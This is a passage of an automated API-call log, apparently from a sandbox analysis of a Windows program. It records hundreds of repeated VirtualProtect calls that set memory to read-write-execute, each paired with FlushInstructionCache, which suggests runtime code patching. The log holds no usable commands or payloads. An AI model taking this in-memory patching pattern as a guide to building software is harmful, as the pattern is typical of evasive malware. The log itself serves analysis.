lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.217] GetCurrentProcess () returned 0xffffffff [0105.217] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.217] GetCurrentProcess () returned 0xffffffff [0105.217] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.217] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.218] GetCurrentProcess () returned 0xffffffff [0105.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.218] GetCurrentProcess () returned 0xffffffff [0105.218] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.218] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.219] GetCurrentProcess () returned 0xffffffff [0105.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.219] GetCurrentProcess () returned 0xffffffff [0105.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.219] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.219] GetCurrentProcess () returned 0xffffffff [0105.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.219] GetCurrentProcess () returned 0xffffffff [0105.219] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.220] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.220] GetCurrentProcess () returned 0xffffffff [0105.220] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.220] GetCurrentProcess () returned 0xffffffff [0105.220] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.220] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.221] GetCurrentProcess () returned 0xffffffff [0105.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.221] GetCurrentProcess () returned 0xffffffff [0105.221] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.221] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.222] GetCurrentProcess () returned 0xffffffff [0105.222] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.222] GetCurrentProcess () returned 0xffffffff [0105.222] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.222] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.222] GetCurrentProcess () returned 0xffffffff [0105.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.223] GetCurrentProcess () returned 0xffffffff [0105.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.223] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.223] GetCurrentProcess () returned 0xffffffff [0105.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.223] GetCurrentProcess () returned 0xffffffff [0105.223] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.223] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.224] GetCurrentProcess () returned 0xffffffff [0105.224] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.224] GetCurrentProcess () returned 0xffffffff [0105.224] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.224] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.225] GetCurrentProcess () returned 0xffffffff [0105.225] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.225] GetCurrentProcess () returned 0xffffffff [0105.225] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.225] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.226] GetCurrentProcess () returned 0xffffffff [0105.226] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.226] GetCurrentProcess () returned 0xffffffff [0105.226] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.226] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.227] GetCurrentProcess () returned 0xffffffff [0105.227] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.227] GetCurrentProcess () returned 0xffffffff [0105.227] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.227] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.228] GetCurrentProcess () returned 0xffffffff [0105.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.228] GetCurrentProcess () returned 0xffffffff [0105.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.228] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.228] GetCurrentProcess () returned 0xffffffff [0105.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.228] GetCurrentProcess () returned 0xffffffff [0105.228] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.228] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.239] GetCurrentProcess () returned 0xffffffff [0105.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.239] GetCurrentProcess () returned 0xffffffff [0105.239] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.239] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.240] GetCurrentProcess () returned 0xffffffff [0105.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.240] GetCurrentProcess () returned 0xffffffff [0105.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.240] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.240] GetCurrentProcess () returned 0xffffffff [0105.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.240] GetCurrentProcess () returned 0xffffffff [0105.240] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.241] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.241] GetCurrentProcess () returned 0xffffffff [0105.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.241] GetCurrentProcess () returned 0xffffffff [0105.241] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.241] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.242] GetCurrentProcess () returned 0xffffffff [0105.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.242] GetCurrentProcess () returned 0xffffffff [0105.242] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.242] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.242] GetCurrentProcess () returned 0xffffffff [0105.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.243] GetCurrentProcess () returned 0xffffffff [0105.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.243] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.243] GetCurrentProcess () returned 0xffffffff [0105.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.243] GetCurrentProcess () returned 0xffffffff [0105.243] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.243] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.244] GetCurrentProcess () returned 0xffffffff [0105.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.244] GetCurrentProcess () returned 0xffffffff [0105.244] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.244] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.246] GetCurrentProcess () returned 0xffffffff [0105.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.246] GetCurrentProcess () returned 0xffffffff [0105.246] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.247] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.247] GetCurrentProcess () returned 0xffffffff [0105.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.247] GetCurrentProcess () returned 0xffffffff [0105.247] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6288, dwSize=0x14) returned 1 [0105.247] VirtualProtect (in: lpAddress=0xcaa6288, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.248] GetCurrentProcess () returned 0xffffffff [0105.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6289, dwSize=0x2) returned 1 [0105.248] GetCurrentProcess () returned 0xffffffff [0105.248] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a8, dwSize=0x14) returned 1 [0105.248] VirtualProtect (in: lpAddress=0xcaa62a8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.249] GetCurrentProcess () returned 0xffffffff [0105.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62a9, dwSize=0x2) returned 1 [0105.249] GetCurrentProcess () returned 0xffffffff [0105.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c8, dwSize=0x14) returned 1 [0105.249] VirtualProtect (in: lpAddress=0xcaa62c8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.249] GetCurrentProcess () returned 0xffffffff [0105.249] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa62c9, dwSize=0x2) returned 1 [0105.250] GetAsyncKeyState (vKey=3) returned 0 [0105.250] VarCmp (pvarLeft=0x197dcc, pvarRight=0x197dbc, lcid=0x0, dwFlags=0x30001) returned 0x2 [0105.251] CRetailMalloc_Alloc () returned 0xcbddce8 [0105.251] memcpy (in: _Dst=0xaf5168, _Src=0x1976bc, _Size=0x4 | out: _Dst=0xaf5168) returned 0xaf5168 [0105.251] memcpy (in: _Dst=0xcbddd08, _Src=0x197724, _Size=0x18 | out: _Dst=0xcbddd08) returned 0xcbddd08 [0105.251] CRetailMalloc_Realloc () returned 0xcbddce8 [0105.251] CRetailMalloc_Free () returned 0x1 [0105.251] GetCurrentProcess () returned 0xffffffff [0105.251] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcc, dwSize=0x14) returned 1 [0105.251] VirtualProtect (in: lpAddress=0xcaa6dcc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.252] GetCurrentProcess () returned 0xffffffff [0105.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dcd, dwSize=0x2) returned 1 [0105.252] GetCurrentProcess () returned 0xffffffff [0105.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6dec, dwSize=0x14) returned 1 [0105.252] VirtualProtect (in: lpAddress=0xcaa6dec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.252] GetCurrentProcess () returned 0xffffffff [0105.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ded, dwSize=0x2) returned 1 [0105.252] GetCurrentProcess () returned 0xffffffff [0105.252] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0c, dwSize=0x14) returned 1 [0105.252] VirtualProtect (in: lpAddress=0xcaa6e0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.253] GetCurrentProcess () returned 0xffffffff [0105.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e0d, dwSize=0x2) returned 1 [0105.253] GetCurrentProcess () returned 0xffffffff [0105.253] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2c, dwSize=0x14) returned 1 [0105.253] VirtualProtect (in: lpAddress=0xcaa6e2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.254] GetCurrentProcess () returned 0xffffffff [0105.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e2d, dwSize=0x2) returned 1 [0105.254] GetCurrentProcess () returned 0xffffffff [0105.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4c, dwSize=0x14) returned 1 [0105.254] VirtualProtect (in: lpAddress=0xcaa6e4c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.254] GetCurrentProcess () returned 0xffffffff [0105.254] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e4d, dwSize=0x2) returned 1 [0105.255] GetCurrentProcess () returned 0xffffffff [0105.255] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6c, dwSize=0x14) returned 1 [0105.255] VirtualProtect (in: lpAddress=0xcaa6e6c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.255] GetCurrentProcess () returned 0xffffffff [0105.255] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e6d, dwSize=0x2) returned 1 [0105.255] GetCurrentProcess () returned 0xffffffff [0105.255] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8c, dwSize=0x14) returned 1 [0105.255] VirtualProtect (in: lpAddress=0xcaa6e8c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.256] GetCurrentProcess () returned 0xffffffff [0105.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6e8d, dwSize=0x2) returned 1 [0105.256] GetCurrentProcess () returned 0xffffffff [0105.256] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eac, dwSize=0x14) returned 1 [0105.256] VirtualProtect (in: lpAddress=0xcaa6eac, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.257] GetCurrentProcess () returned 0xffffffff [0105.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ead, dwSize=0x2) returned 1 [0105.257] GetCurrentProcess () returned 0xffffffff [0105.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecc, dwSize=0x14) returned 1 [0105.257] VirtualProtect (in: lpAddress=0xcaa6ecc, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.257] GetCurrentProcess () returned 0xffffffff [0105.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6ecd, dwSize=0x2) returned 1 [0105.257] GetCurrentProcess () returned 0xffffffff [0105.257] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eec, dwSize=0x14) returned 1 [0105.258] VirtualProtect (in: lpAddress=0xcaa6eec, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.258] GetCurrentProcess () returned 0xffffffff [0105.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6eed, dwSize=0x2) returned 1 [0105.258] GetCurrentProcess () returned 0xffffffff [0105.258] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0c, dwSize=0x14) returned 1 [0105.258] VirtualProtect (in: lpAddress=0xcaa6f0c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.259] GetCurrentProcess () returned 0xffffffff [0105.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f0d, dwSize=0x2) returned 1 [0105.259] GetCurrentProcess () returned 0xffffffff [0105.259] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2c, dwSize=0x14) returned 1 [0105.259] VirtualProtect (in: lpAddress=0xcaa6f2c, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.260] GetCurrentProcess () returned 0xffffffff [0105.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa6f2d, dwSize=0x2) returned 1 [0105.260] GetCurrentProcess () returned 0xffffffff [0105.260] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e0, dwSize=0x14) returned 1 [0105.260] VirtualProtect (in: lpAddress=0xcaa82e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.315] GetCurrentProcess () returned 0xffffffff [0105.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa82e1, dwSize=0x2) returned 1 [0105.315] GetCurrentProcess () returned 0xffffffff [0105.315] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8300, dwSize=0x14) returned 1 [0105.315] VirtualProtect (in: lpAddress=0xcaa8300, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.316] GetCurrentProcess () returned 0xffffffff [0105.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8301, dwSize=0x2) returned 1 [0105.316] GetCurrentProcess () returned 0xffffffff [0105.316] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8320, dwSize=0x14) returned 1 [0105.316] VirtualProtect (in: lpAddress=0xcaa8320, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.317] GetCurrentProcess () returned 0xffffffff [0105.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8321, dwSize=0x2) returned 1 [0105.317] GetCurrentProcess () returned 0xffffffff [0105.317] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8340, dwSize=0x14) returned 1 [0105.317] VirtualProtect (in: lpAddress=0xcaa8340, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.318] GetCurrentProcess () returned 0xffffffff [0105.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8341, dwSize=0x2) returned 1 [0105.318] GetCurrentProcess () returned 0xffffffff [0105.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8360, dwSize=0x14) returned 1 [0105.318] VirtualProtect (in: lpAddress=0xcaa8360, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.318] GetCurrentProcess () returned 0xffffffff [0105.318] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8361, dwSize=0x2) returned 1 [0105.318] GetCurrentProcess () returned 0xffffffff [0105.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8380, dwSize=0x14) returned 1 [0105.319] VirtualProtect (in: lpAddress=0xcaa8380, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.319] GetCurrentProcess () returned 0xffffffff [0105.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8381, dwSize=0x2) returned 1 [0105.319] GetCurrentProcess () returned 0xffffffff [0105.319] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a0, dwSize=0x14) returned 1 [0105.319] VirtualProtect (in: lpAddress=0xcaa83a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.320] GetCurrentProcess () returned 0xffffffff [0105.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83a1, dwSize=0x2) returned 1 [0105.320] GetCurrentProcess () returned 0xffffffff [0105.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c0, dwSize=0x14) returned 1 [0105.320] VirtualProtect (in: lpAddress=0xcaa83c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.320] GetCurrentProcess () returned 0xffffffff [0105.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83c1, dwSize=0x2) returned 1 [0105.320] GetCurrentProcess () returned 0xffffffff [0105.320] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e0, dwSize=0x14) returned 1 [0105.320] VirtualProtect (in: lpAddress=0xcaa83e0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.321] GetCurrentProcess () returned 0xffffffff [0105.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa83e1, dwSize=0x2) returned 1 [0105.321] GetCurrentProcess () returned 0xffffffff [0105.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8400, dwSize=0x14) returned 1 [0105.321] VirtualProtect (in: lpAddress=0xcaa8400, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.321] GetCurrentProcess () returned 0xffffffff [0105.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8401, dwSize=0x2) returned 1 [0105.321] GetCurrentProcess () returned 0xffffffff [0105.321] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8420, dwSize=0x14) returned 1 [0105.321] VirtualProtect (in: lpAddress=0xcaa8420, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.322] GetCurrentProcess () returned 0xffffffff [0105.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8421, dwSize=0x2) returned 1 [0105.322] GetCurrentProcess () returned 0xffffffff [0105.322] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8440, dwSize=0x14) returned 1 [0105.322] VirtualProtect (in: lpAddress=0xcaa8440, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.323] GetCurrentProcess () returned 0xffffffff [0105.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8441, dwSize=0x2) returned 1 [0105.323] GetCurrentProcess () returned 0xffffffff [0105.323] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8460, dwSize=0x14) returned 1 [0105.323] VirtualProtect (in: lpAddress=0xcaa8460, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.324] GetCurrentProcess () returned 0xffffffff [0105.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8461, dwSize=0x2) returned 1 [0105.324] GetCurrentProcess () returned 0xffffffff [0105.324] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8480, dwSize=0x14) returned 1 [0105.324] VirtualProtect (in: lpAddress=0xcaa8480, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.325] GetCurrentProcess () returned 0xffffffff [0105.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa8481, dwSize=0x2) returned 1 [0105.325] GetCurrentProcess () returned 0xffffffff [0105.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a0, dwSize=0x14) returned 1 [0105.325] VirtualProtect (in: lpAddress=0xcaa84a0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.325] GetCurrentProcess () returned 0xffffffff [0105.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84a1, dwSize=0x2) returned 1 [0105.325] GetCurrentProcess () returned 0xffffffff [0105.325] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c0, dwSize=0x14) returned 1 [0105.325] VirtualProtect (in: lpAddress=0xcaa84c0, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1973cc | out: lpflOldProtect=0x1973cc*=0x40) returned 1 [0105.326] GetCurrentProcess () returned 0xffffffff [0105.326] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcaa84c1, dwSize=0x2) returned 1 [0105.326] 